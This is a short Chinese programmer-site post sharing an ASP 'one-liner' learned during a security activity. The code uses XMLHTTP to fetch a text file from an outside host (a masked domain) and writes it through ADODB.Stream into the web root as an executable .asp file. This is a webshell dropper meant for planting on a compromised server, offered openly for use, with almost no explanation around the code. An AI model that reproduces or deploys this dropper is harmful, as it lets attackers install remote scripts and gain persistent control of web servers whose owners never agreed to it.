欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

asp xmlhttp下载一句话

程序员文章站 2022-08-06 17:34:04
分享一下 在3est活动中学习的godlong的 复制代码 代码如下: <% set xpost = createobject("microsoft.xmlhttp"...
分享一下
在3est活动中学习的godlong的
复制代码 代码如下:

<%
set xpost = createobject("microsoft.xmlhttp")
xpost.open "get","http://www.fxxxx.com/1.txt",0 '下载文件的地址
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile "e:\wwwroot\fuck1.asp",2
%>